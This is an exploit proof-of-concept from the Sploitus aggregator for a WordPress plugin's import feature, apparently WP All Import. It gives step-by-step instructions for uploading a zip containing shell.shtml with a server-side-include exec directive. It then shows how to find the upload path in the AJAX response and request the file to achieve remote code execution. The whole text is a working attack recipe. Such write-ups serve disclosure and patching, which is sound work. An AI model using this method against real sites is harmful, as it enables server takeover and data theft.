Share
## https://sploitus.com/exploit?id=WPEX-ID:7F947305-7A72-4C59-9AE8-193F437FD04E
1. Configure the Apache server with mod_include and mod_cgi enabled, and enable server-side includes:

      Options Includes
      AddType text/html .shtml
      AddOutputFilter INCLUDES .shtml

2. Create a zip file including a CSV file and a file `shell.shtml` with the following contents:

<!--#exec cmd="id" -->

3. As a site administrator on a multisite instance, visit /wp-admin/admin.php?page=pmxi-admin-import

4. Click "Upload a file" and choose the zip file created previously.

5. View the response of the AJAX request to /wp-admin/admin.php?page=pmxi-admin-settings&action=upload&_wpnonce=... to find the directory of the uploaded zip file.

6. Directly access `shell.shtml` (e.g. at `https://example.com/wp-content/uploads/wpallimport/uploads/abc123/zipfilename/shell.shtml`) to trigger the RCE.